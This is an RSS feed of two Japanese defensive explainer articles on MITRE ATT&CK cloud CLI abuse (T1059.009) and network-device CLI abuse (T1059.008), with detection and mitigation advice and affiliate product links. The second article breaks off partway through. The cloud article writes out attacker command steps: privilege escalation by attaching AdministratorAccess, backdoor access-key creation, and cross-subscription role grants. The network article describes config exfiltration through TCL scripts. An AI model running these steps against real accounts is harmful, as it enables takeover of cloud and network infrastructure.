<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Execution Archives - AI Security Review</title>
	<atom:link href="https://ai-sec-review.com/category/execution/feed/" rel="self" type="application/rss+xml" />
	<link>https://ai-sec-review.com/category/execution/</link>
	<description>AI執筆×セキュリティ実務者監修のツールレビューサイト</description>
	<lastBuildDate>Thu, 26 Mar 2026 14:38:28 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://ai-sec-review.com/wp-content/uploads/2026/03/favicon_512-100x100.png</url>
	<title>Execution Archives - AI Security Review</title>
	<link>https://ai-sec-review.com/category/execution/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:56 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud Administration]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[T1059.009]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的 [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/">T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的に運用するために欠かせないツールです。しかし、これらの正規ツールが攻撃者に悪用されると、IAMロールの権限で任意のクラウドリソースを操作され、データ漏洩やインフラ破壊に直結します。本記事ではMITRE ATT&amp;CK T1059.009「Cloud Administration Command」の定義、具体的な攻撃シナリオ、検知方法、そして実践的な防御策を、セキュリティ担当者・クラウドエンジニア向けに詳しく解説します。</p>




  <div id="toc" class="toc tnt-number toc-center tnt-number border-element"><input type="checkbox" class="toc-checkbox" id="toc-checkbox-2" checked><label class="toc-title" for="toc-checkbox-2">目次</label>
    <div class="toc-content">
    <ol class="toc-list open"><li><a href="#toc1" tabindex="0">T1059.009 Cloud Administration Commandとは</a></li><li><a href="#toc2" tabindex="0">なぜ攻撃者はクラウド管理コマンドを悪用するのか</a><ol><li><a href="#toc3" tabindex="0">正規ツールであるため検知が困難</a></li><li><a href="#toc4" tabindex="0">強力な権限へのアクセス</a></li><li><a href="#toc5" tabindex="0">マルウェア不要で攻撃が完結</a></li></ol></li><li><a href="#toc6" tabindex="0">AWS CloudShellの悪用シナリオ</a><ol><li><a href="#toc7" tabindex="0">シナリオ1：コンソールセッションハイジャック</a></li><li><a href="#toc8" tabindex="0">シナリオ2：永続化のためのバックドア作成</a></li></ol></li><li><a href="#toc9" tabindex="0">IAMロール悪用との組み合わせ</a><ol><li><a href="#toc10" tabindex="0">権限昇格チェーン</a></li><li><a href="#toc11" tabindex="0">クロスアカウントロールの悪用</a></li></ol></li><li><a href="#toc12" tabindex="0">実際の攻撃事例</a><ol><li><a href="#toc13" tabindex="0">TeamTNTによるクラウドリソースの不正利用</a></li><li><a href="#toc14" tabindex="0">ScarletEelによるAWS環境への侵入</a></li><li><a href="#toc15" tabindex="0">LUCR-3（Scattered Spider）によるSaaS・クラウド攻撃</a></li></ol></li><li><a href="#toc16" tabindex="0">検知方法</a><ol><li><a href="#toc17" tabindex="0">AWS CloudTrailによる検知</a></li><li><a href="#toc18" tabindex="0">Azure Monitorによる検知</a></li><li><a href="#toc19" tabindex="0">GCP Audit Logsによる検知</a></li><li><a href="#toc20" tabindex="0">共通の検知ルール</a></li></ol></li><li><a href="#toc21" tabindex="0">緩和策と防御のベストプラクティス</a><ol><li><a href="#toc22" tabindex="0">最小権限のIAMポリシー設計</a></li><li><a href="#toc23" tabindex="0">条件付きアクセスポリシーの適用</a></li><li><a href="#toc24" tabindex="0">CloudShellの利用制限</a></li><li><a href="#toc25" tabindex="0">認証情報の管理強化</a></li></ol></li><li><a href="#toc26" tabindex="0">おすすめセキュリティ対策ツール</a></li><li><a href="#toc27" tabindex="0">まとめ：クラウド管理コマンドの悪用を防ぐために</a></li></ol>
    </div>
  </div>

<h2 class="wp-block-heading"><span id="toc1">T1059.009 Cloud Administration Commandとは</span></h2>



<p>MITRE ATT&amp;CK T1059.009は、攻撃者がクラウドプロバイダ提供の管理コマンドやCLIツールを利用して悪意ある操作を行う手法です。<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/009/" target="_blank">MITRE ATT&amp;CK公式のT1059.009ページ</a>では、親テクニック<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">T1059 Command and Scripting Interpreter</a>のサブテクニックとして分類されています。</p>



<p>従来の<a href="https://ai-sec-review.com/mitre-attck-t1059-001-powershell/">T1059.001 PowerShell</a>やBashなどはOS上のコマンドインタプリタが対象でしたが、T1059.009はクラウドネイティブな管理インターフェースに焦点を当てています。対象となるのはAWS CLI、Azure CLI、Azure PowerShell、Google Cloud SDK（gcloud）、AWS CloudShellなどです。</p>



<h2 class="wp-block-heading"><span id="toc2">なぜ攻撃者はクラウド管理コマンドを悪用するのか</span></h2>



<p>クラウド管理コマンドが攻撃者にとって魅力的な理由は以下の3点です。</p>



<h3 class="wp-block-heading"><span id="toc3">正規ツールであるため検知が困難</span></h3>



<p>AWS CLIやAzure CLIは運用チームが日常的に使用するツールです。攻撃者がこれらを使うと、正規の運用操作と悪意ある操作の区別が非常に困難になります。これは「Living off the Land（環境寄生型攻撃）」のクラウド版と言えます。</p>



<h3 class="wp-block-heading"><span id="toc4">強力な権限へのアクセス</span></h3>



<p>クラウドCLIはIAMロールやサービスプリンシパルに紐づいた権限で動作します。過剰な権限が付与されたIAMロールが漏洩した場合、攻撃者はS3バケットの全データダウンロード、EC2インスタンスの起動・停止、IAMポリシーの変更など、広範な操作を実行できます。</p>



<h3 class="wp-block-heading"><span id="toc5">マルウェア不要で攻撃が完結</span></h3>



<p>クラウドCLIはAPIを直接呼び出すため、マルウェアのインストールが不要です。認証情報（アクセスキーやトークン）さえ入手すれば、攻撃者のローカル環境から直接クラウドリソースを操作できてしまいます。</p>





<h2 class="wp-block-heading"><span id="toc6">AWS CloudShellの悪用シナリオ</span></h2>



<p>AWS CloudShellはAWSマネジメントコンソールからブラウザ上で直接CLIを実行できるサービスです。攻撃者がAWSコンソールへのアクセス権を得た場合、以下のような悪用が可能になります。</p>



<h3 class="wp-block-heading"><span id="toc7">シナリオ1：コンソールセッションハイジャック</span></h3>



<p>フィッシングや認証情報の窃取によりAWSコンソールにログインした攻撃者は、CloudShellを起動して追加のツールインストールなしに即座にAWS CLIコマンドを実行できます。CloudShellはセッションユーザーのIAM権限を自動的に引き継ぐため、権限設定によっては甚大な被害を引き起こします。</p>



<h3 class="wp-block-heading"><span id="toc8">シナリオ2：永続化のためのバックドア作成</span></h3>



<p>CloudShellから<code>aws iam create-access-key</code>コマンドで新しいアクセスキーを生成し、外部に送信するケースがあります。また、<code>aws lambda create-function</code>でバックドア用のLambda関数をデプロイするなど、永続的なアクセス手段を確保する手法も報告されています。</p>



<h2 class="wp-block-heading"><span id="toc9">IAMロール悪用との組み合わせ</span></h2>



<p>T1059.009は単独で使用されることもありますが、IAMロールの悪用と組み合わさることで被害が拡大します。</p>



<h3 class="wp-block-heading"><span id="toc10">権限昇格チェーン</span></h3>



<p>攻撃者は初期アクセスで得た限定的な権限から、以下のようなステップで権限を昇格させます。</p>



<ol class="wp-block-list">
<li>漏洩したアクセスキーで<code>aws sts get-caller-identity</code>を実行し、現在の権限を確認</li>
<li><code>aws iam list-attached-user-policies</code>でポリシーを列挙</li>
<li><code>aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess</code>で管理者権限を付与</li>
<li>管理者権限で任意のリソースを操作</li>
</ol>



<h3 class="wp-block-heading"><span id="toc11">クロスアカウントロールの悪用</span></h3>



<p>Azure環境では<code>az account list</code>でアクセス可能なサブスクリプションを列挙し、<code>az role assignment create</code>で他のサブスクリプションへの権限を取得するケースがあります。GCP環境でも<code>gcloud projects list</code>と<code>gcloud projects add-iam-policy-binding</code>の組み合わせで同様の横展開が可能です。</p>



<h2 class="wp-block-heading"><span id="toc12">実際の攻撃事例</span></h2>



<p>クラウド管理コマンドを悪用する脅威アクターの活動が複数報告されています。</p>



<h3 class="wp-block-heading"><span id="toc13">TeamTNTによるクラウドリソースの不正利用</span></h3>



<p>TeamTNTはクラウド環境を標的としたクリプトマイニンググループです。AWSのメタデータサービス（169.254.169.254）から認証情報を窃取し、AWS CLIを使ってEC2インスタンスの大量起動やS3バケットへのアクセスを行います。</p>



<h3 class="wp-block-heading"><span id="toc14">ScarletEelによるAWS環境への侵入</span></h3>



<p>ScarletEelは、Kubernetes環境への初期侵入後にAWS CLIを使って認証情報を列挙し、クロスアカウントでのラテラルムーブメントを行ったことが報告されています。<code>aws sts assume-role</code>を使い、複数のAWSアカウントを横断して暗号資産マイニングインフラを構築しました。</p>



<h3 class="wp-block-heading"><span id="toc15">LUCR-3（Scattered Spider）によるSaaS・クラウド攻撃</span></h3>



<p>LUCR-3はソーシャルエンジニアリングでIDP（Identity Provider）への初期アクセスを取得し、Azure CLIやAWS CLIを使ってクラウドリソースを操作することで知られています。特にAzure ADの設定変更やAWSのOrganizations操作を通じた大規模な情報窃取が確認されています。</p>



<h2 class="wp-block-heading"><span id="toc16">検知方法</span></h2>



<p>クラウド管理コマンドの悪用を検知するには、各クラウドプロバイダの監査ログを活用します。</p>



<h3 class="wp-block-heading"><span id="toc17">AWS CloudTrailによる検知</span></h3>



<p><a rel="noopener" href="https://docs.aws.amazon.com/ja_jp/awscloudtrail/latest/userguide/cloudtrail-user-guide.html" target="_blank">AWS CloudTrail</a>はすべてのAPI呼び出しを記録します。以下のイベントを監視することで不審な操作を検知できます。</p>



<ul class="wp-block-list">
<li><strong>CreateAccessKey</strong>：新しいアクセスキーの生成（バックドア作成の兆候）</li>
<li><strong>AssumeRole</strong>：ロールの引き受け（権限昇格・ラテラルムーブメント）</li>
<li><strong>ConsoleLogin + CloudShell起動</strong>：通常と異なるIPアドレスからのログイン後のCloudShell使用</li>
<li><strong>PutBucketPolicy</strong>：S3バケットポリシーの変更（データ流出の準備）</li>
</ul>



<h3 class="wp-block-heading"><span id="toc18">Azure Monitorによる検知</span></h3>



<p>Azure Activity LogとMicrosoft Entra ID（旧Azure AD）のサインインログを組み合わせて監視します。<code>az role assignment create</code>の実行、通常と異なるIPアドレスからのAzure CLI認証、サービスプリンシパルの新規作成などが重要な検知ポイントです。</p>



<h3 class="wp-block-heading"><span id="toc19">GCP Audit Logsによる検知</span></h3>



<p>GCP Cloud Audit Logsでは、Admin Activity ログとData Access ログを有効にし、<code>SetIamPolicy</code>の呼び出し、新規サービスアカウントキーの作成、通常と異なるリージョンからのAPI呼び出しを監視します。</p>



<h3 class="wp-block-heading"><span id="toc20">共通の検知ルール</span></h3>



<p>どのクラウドプロバイダでも有効な検知アプローチとして、以下のルールを設定することを推奨します。</p>



<ul class="wp-block-list">
<li>通常の運用時間外（深夜・休日）のCLI操作のアラート</li>
<li>新しいIPアドレスやユーザーエージェントからのAPI呼び出し</li>
<li>短時間での大量API呼び出し（偵察活動の兆候）</li>
<li>IAM関連操作（権限変更・キー作成）の即時アラート</li>
</ul>



<h2 class="wp-block-heading"><span id="toc21">緩和策と防御のベストプラクティス</span></h2>



<h3 class="wp-block-heading"><span id="toc22">最小権限のIAMポリシー設計</span></h3>



<p>IAMポリシーは最小権限の原則（Principle of Least Privilege）に基づいて設計します。<code>*</code>ワイルドカードの使用を避け、必要なリソースとアクションのみを許可するポリシーを作成してください。AWSでは<a rel="noopener" href="https://docs.aws.amazon.com/ja_jp/IAM/latest/UserGuide/access_policies_generate-policy.html" target="_blank">IAM Access Analyzer</a>を使って実際のアクセスパターンからポリシーを生成できます。</p>



<h3 class="wp-block-heading"><span id="toc23">条件付きアクセスポリシーの適用</span></h3>



<p>Azure Conditional Access PolicyやAWS IAM Conditionを使い、信頼できるIPアドレス、デバイス、時間帯のみからCLI操作を許可します。特にMFA（多要素認証）の強制は基本中の基本です。</p>



<h3 class="wp-block-heading"><span id="toc24">CloudShellの利用制限</span></h3>



<p>AWS CloudShellは便利ですが、攻撃者にも同様に便利です。IAMポリシーで<code>cloudshell:*</code>の権限を制限するか、AWS Organizations SCP（Service Control Policy）でCloudShellの利用を特定のアカウントや役割に限定することを検討してください。</p>



<h3 class="wp-block-heading"><span id="toc25">認証情報の管理強化</span></h3>



<p>長期的なアクセスキーの使用を避け、一時的な認証情報（STS）を使用します。アクセスキーは定期的にローテーションし、不要なキーは即座に無効化してください。<a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a>も、クラウド認証情報の管理について継続的に注意喚起を行っています。</p>



<h2 class="wp-block-heading"><span id="toc26">おすすめセキュリティ対策ツール</span></h2>



<p>本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p><strong>🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入</strong><br>
クラウド環境の保護と併せて、管理端末のエンドポイントセキュリティも重要です。信頼性の高いセキュリティソフトの導入を強くお勧めします。</p>
</blockquote>



<ul class="wp-block-list">
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+22F7EA+4OQ4+5YRHE" target="_blank"><strong>ESET（イーセット）</strong></a> — 誤検知が少なく軽量。中小企業に人気のコスパ重視セキュリティソフト ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+23M2LU+5AZU+61Z81" target="_blank"><strong>ウイルスバスター</strong></a> — 日本語サポートが充実。国産ソフトで中小企業導入実績多数 ※PR</li>
<li><a rel="nofollow sponsored noopener" href="https://px.a8.net/svt/ejp?a8mat=4AZE02+230N02+3VKO+5YRHE" target="_blank"><strong>Norton（ノートン）</strong></a> — 世界最大手のセキュリティベンダー。VPN機能も含む総合対策 ※PR</li>
</ul>



<p>※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。</p>



<h2 class="wp-block-heading"><span id="toc27">まとめ：クラウド管理コマンドの悪用を防ぐために</span></h2>



<ul class="wp-block-list">
<li>T1059.009はAWS CLI・Azure CLI・GCloud CLIなど正規のクラウド管理ツールを悪用する攻撃手法であり、正規操作との区別が困難なため検知難易度が高い</li>
<li>CloudShellの悪用やIAMロールとの組み合わせにより、権限昇格・ラテラルムーブメント・データ窃取に発展する</li>
<li>CloudTrail・Azure Monitor・GCP Audit Logsでの監査ログ監視と、通常パターンからの逸脱検知が最も有効な対策</li>
<li>最小権限のIAMポリシー設計、条件付きアクセスポリシー、CloudShellの利用制限を組み合わせた多層防御が不可欠</li>
<li>認証情報（アクセスキー）の管理強化と定期ローテーションを徹底し、攻撃の起点となる認証情報漏洩リスクを低減する</li>
</ul>



<p>クラウド環境のセキュリティは、従来のオンプレミスとは異なるアプローチが必要です。正規ツールが攻撃に使われるからこそ、ログの監視と権限管理が最大の防御線となります。自社のクラウド環境のIAM設定を今すぐ見直してみてください。</p>



<p>本記事はMITRE ATT&amp;CK® v16に基づいています。© The MITRE Corporation. Licensed under Apache License 2.0.<br>※本サイトはMITRE非公式の解説サイトです</p>



<p><strong>参考資料</strong>：
<a rel="noopener" href="https://attack.mitre.org/techniques/T1059/009/" target="_blank">MITRE ATT&amp;CK T1059.009 &#8211; Cloud Administration Command</a> /
<a rel="noopener" href="https://www.ipa.go.jp/security/10threats/10threats2026.html" target="_blank">情報セキュリティ10大脅威 2026（IPA）</a> /
<a rel="noopener" href="https://www.jpcert.or.jp/" target="_blank">JPCERT/CC</a> /
<a rel="noopener" href="https://www.nisc.go.jp/" target="_blank">内閣サイバーセキュリティセンター（NISC）</a>
</p>



<hr class="wp-block-separator has-alpha-channel-opacity"/>



<p style="color:#64748b;font-size:0.85rem">Based on MITRE ATT&#038;CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.<br>本ページは非公式翻訳・解説です。正確な情報は<a rel="noopener" href="https://attack.mitre.org/" target="_blank">MITRE公式サイト</a>をご参照ください。</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/">T1059.009 クラウド管理コマンドを悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ai-sec-review.com/mitre-attck-t1059-009-cloud-administration-command/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</title>
		<link>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/</link>
					<comments>https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/#respond</comments>
		
		<dc:creator><![CDATA[]]></dc:creator>
		<pubDate>Wed, 25 Mar 2026 20:07:45 +0000</pubDate>
				<category><![CDATA[Execution]]></category>
		<category><![CDATA[T1059]]></category>
		<category><![CDATA[MITRE ATT&CK]]></category>
		<category><![CDATA[Network Device CLI]]></category>
		<category><![CDATA[T1059.008]]></category>
		<category><![CDATA[ルーター]]></category>
		<guid isPermaLink="false">https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/</guid>

					<description><![CDATA[<p>※本記事にはアフィリエイトリンクが含まれます。詳しくはプライバシーポリシー・広告掲載についてをご覧ください。 ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツール [&#8230;]</p>
<p>The post <a href="https://ai-sec-review.com/mitre-attck-t1059-008-network-device-cli/">T1059.008 ネットワーク機器CLI（Network Device CLI）を悪用した攻撃手法と検知方法【MITRE ATT&#038;CK】</a> appeared first on <a href="https://ai-sec-review.com">AI Security Review</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>※本記事にはアフィリエイトリンクが含まれます。詳しくは<a href="https://ai-sec-review.com/disclosure/">プライバシーポリシー・広告掲載について</a>をご覧ください。</p>



<p>ネットワーク機器のCLI（コマンドラインインターフェース）は、ルーターやスイッチの管理に欠かせない強力なツールです。しかし近年、攻撃者がCisco IOS、JunOS、NX-OSなどのネットワーク機器CLIを悪用し、組織のネットワークインフラを侵害する事例が増加しています。MITRE ATT&#038;CKフレームワークではこの手法をT1059.008「Network Device CLI」として分類しています。本記事では、ネットワーク機器CLIを悪用した攻撃の仕組み、実際の攻撃グループによる事例、検知方法、そして効果的な防御策まで、セキュリティ担当者が知るべきポイントを網羅的に解説します。</p>




  <div id="toc" class="toc tnt-number toc-center tnt-number border-element"><input type="checkbox" class="toc-checkbox" id="toc-checkbox-4" checked><label class="toc-title" for="toc-checkbox-4">目次</label>
    <div class="toc-content">
    <ol class="toc-list open"><li><a href="#toc1" tabindex="0">T1059.008 Network Device CLIとは</a></li><li><a href="#toc2" tabindex="0">攻撃者がネットワーク機器CLIを狙う理由</a><ol><li><a href="#toc3" tabindex="0">ネットワークの中枢を掌握できる</a></li><li><a href="#toc4" tabindex="0">セキュリティ製品の監視対象外</a></li><li><a href="#toc5" tabindex="0">認証情報の取得が容易</a></li></ol></li><li><a href="#toc6" tabindex="0">ネットワーク機器CLI上でのTCLスクリプト悪用</a></li><li><a href="#toc7" tabindex="0">実際の攻撃グループによる事例</a><ol><li><a href="#toc8" tabindex="0">SYNful Knock（2015年）</a></li><li><a href="#toc9" tabindex="0">APT33 / Elfin</a></li><li><a href="#toc10" tabindex="0">Turla</a></li></ol></li><li><a href="#toc11" tabindex="0">検知方法</a><ol><li><a href="#toc12" tabindex="0">Syslogによるログ監視</a></li><li><a href="#toc13" tabindex="0">TACACS+によるコマンドアカウンティング</a></li><li><a href="#toc14" tabindex="0">NetFlowによるトラフィック分析</a></li><li><a href="#toc15" tabindex="0">SNMPトラップとファームウェア整合性検証</a></li></ol></li><li><a href="#toc16" tabindex="0">緩和策・防御方法</a><ol><li><a href="#toc17" tabindex="0">AAA（認証・認可・アカウンティング）の徹底</a></li><li><a href="#toc18" tabindex="0">ファームウェア整合性の確保</a></li><li><a href="#toc19" tabindex="0">ネットワークセグメンテーション</a></li><li><a href="#toc20" tabindex="0">構成管理とバージョン管理</a></li></ol></li><li><a href="#toc21" tabindex="0">おすすめセキュリティ対策ツール</a></li><li><a href="#toc22" tabindex="0">まとめ</a></li><li><a href="#toc23" tabindex="0">参考リンク</a></li></ol>
    </div>
  </div>

<h2 class="wp-block-heading"><span id="toc1">T1059.008 Network Device CLIとは</span></h2>



<p>MITRE ATT&#038;CKにおけるT1059.008は、攻撃者がネットワーク機器に備わるCLI（コマンドラインインターフェース）を悪用して不正な操作を行う攻撃手法です。T1059「<a href="https://ai-sec-review.com/mitre-attck-t1059-command-scripting-interpreter/">Command and Scripting Interpreter</a>」のサブテクニックとして位置づけられています。</p>



<p>ネットワーク機器には、ルーター、スイッチ、ファイアウォールなどが含まれ、それぞれ独自のCLI環境を持っています。代表的なものにCisco IOSのCLI、Juniper JunOS CLI、Arista EOS CLIなどがあります。攻撃者はこれらのCLIにアクセスすることで、ネットワーク設定の変更、トラフィックの傍受、バックドアの設置、さらにはファームウェアの改ざんまで行うことが可能です。</p>



<p>この攻撃手法が特に危険なのは、ネットワーク機器がセキュリティ監視の盲点になりやすい点にあります。多くの組織ではエンドポイントやサーバーの監視に注力する一方、ネットワーク機器のセキュリティ監視は手薄になりがちです。</p>



<h2 class="wp-block-heading"><span id="toc2">攻撃者がネットワーク機器CLIを狙う理由</span></h2>



<h3 class="wp-block-heading"><span id="toc3">ネットワークの中枢を掌握できる</span></h3>



<p>ルーターやスイッチはネットワークトラフィックの中継点です。これらの機器を制御することで、攻撃者は通過するすべてのトラフィックを傍受・改ざんする能力を得ます。ACL（アクセス制御リスト）の変更によるファイアウォールルールの無効化、ルーティングテーブルの書き換えによるトラフィックのリダイレクト、GREトンネルやVPN設定を利用したデータの外部送信など、ネットワークレベルでの攻撃が可能になります。</p>



<h3 class="wp-block-heading"><span id="toc4">セキュリティ製品の監視対象外</span></h3>



<p>EDR（Endpoint Detection and Response）やアンチウイルスソフトはネットワーク機器上では動作しません。従来のセキュリティ対策ではネットワーク機器内部の不正な操作を検知することが困難です。攻撃者はこの監視の隙間を利用して、長期間にわたる持続的なアクセスを維持します。</p>



<h3 class="wp-block-heading"><span id="toc5">認証情報の取得が容易</span></h3>



<p>多くの組織では、ネットワーク機器にデフォルトの認証情報や脆弱なパスワードが使用されています。また、SSH鍵の管理が不十分であったり、TACACS+やRADIUSなどの認証サーバーとの連携が適切に構成されていないケースも少なくありません。攻撃者は初期アクセスで取得した認証情報を流用して、ネットワーク機器へのアクセスを獲得します。</p>

<!-- /wp:post-content -->

<!-- wp:image -->
<figure class="wp-block-image"><img decoding="async" src="" alt="ネットワーク機器CLIを利用した攻撃の概要"/></figure>
<!-- /wp:image -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc6">ネットワーク機器CLI上でのTCLスクリプト悪用</span></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Cisco IOSには、TCL（Tool Command Language）スクリプトを実行する機能が搭載されています。攻撃者はこの機能を悪用して、ネットワーク機器上で自動化された不正操作を実行します。</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>具体的な悪用例として以下が挙げられます：</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li><strong>設定情報の外部送信</strong>：TCLスクリプトでルーターの設定ファイル（running-config）を取得し、TFTPやHTTPで外部サーバーに送信</li>
<li><strong>バックドアアカウントの作成</strong>：管理者権限を持つ隠しアカウントをスクリプトで自動作成</li>
<li><strong>ネットワークスキャン</strong>：TCLのソケット機能を利用して、内部ネットワークのスキャンを実行</li>
<li><strong>Syslog操作</strong>：ログの改ざんや削除により、攻撃の痕跡を消去</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>TCLスクリプトの悪用は、「tclsh」コマンドでインタラクティブモードに入ることで実行されます。Cisco IOSのバージョンによっては、権限レベル15（特権EXECモード）でなくても一部のTCL機能にアクセスできる場合があるため、権限管理の徹底が重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc7">実際の攻撃グループによる事例</span></h2>
<!-- /wp:heading -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc8">SYNful Knock（2015年）</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>2015年にFireEye（現Mandiant）が発見した「SYNful Knock」は、Cisco IOSルーターのファームウェアを改ざんするインプラント攻撃です。攻撃者はルーターのCLIアクセスを得た後、正規のIOSイメージを改ざんされたものに置き換えました。この改ざんされたファームウェアは再起動後も残存し、攻撃者に持続的なバックドアアクセスを提供しました。最大14カ国で被害が確認され、ネットワーク機器を標的とした攻撃の深刻さを世界に示しました。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc9">APT33 / Elfin</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>イラン系の攻撃グループAPT33（別名Elfin）は、中東やエネルギー分野の組織を標的にした攻撃キャンペーンにおいて、ネットワーク機器の脆弱性を積極的に悪用することが知られています。標的組織のネットワーク機器にアクセスし、ネットワーク設定を変更することでデータ傍受や横展開を行います。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc10">Turla</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ロシア系のAPTグループTurlaは、ネットワークインフラストラクチャを標的とした高度な攻撃で知られています。ネットワーク機器を踏み台として利用し、標的組織の内部ネットワークへの持続的なアクセスを維持する手法を用いています。特にISP（インターネットサービスプロバイダ）レベルのネットワーク機器を侵害することで、広範囲の通信傍受を可能にしていました。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading"><span id="toc11">検知方法</span></h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器CLIの不正使用を検知するためには、複数のアプローチを組み合わせることが重要です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc12">Syslogによるログ監視</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>ネットワーク機器のSyslogを外部のSyslogサーバーに転送し、リアルタイムで監視します。特に注目すべきログイベントは以下の通りです：</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list">
<li>設定変更イベント（%SYS-5-CONFIG_I）</li>
<li>ログイン試行の失敗（%SEC_LOGIN-5-LOGIN_SUCCESS, %SEC_LOGIN-4-LOGIN_FAILED）</li>
<li>特権モードへの昇格（%SYS-5-PRIV_AUTH_PASS）</li>
<li>ファイル操作イベント（コピー、削除など）</li>
</ul>
<!-- /wp:list -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc13">TACACS+によるコマンドアカウンティング</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>TACACS+サーバーを導入し、コマンドアカウンティングを有効にすることで、ネットワーク機器上で実行されたすべてのコマンドを記録できます。「show running-config」「copy」「tclsh」など、機密性の高いコマンドの実行を監視し、不審なコマンド実行パターンを検知します。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc14">NetFlowによるトラフィック分析</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>NetFlowデータを分析することで、ネットワーク機器から外部への不審な通信を検知できます。特に、管理用ネットワーク以外からのSSH/Telnet接続や、機器から外部へのTFTP/HTTP通信は要注意です。</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading"><span id="toc15">SNMPトラップとファームウェア整合性検証</span></h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>SNMP（Simple Network Management Protocol）トラップを設定し、設定変更やインターフェース状態の変化をリアルタイムで通知します。また、定期的にファームウェアのハッシュ値を検証し、不正な改ざんがないか確認することも重要です。Ciscoの場合は「verify /md5」コマンドでIOSイメージの整合性を確認できます。</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
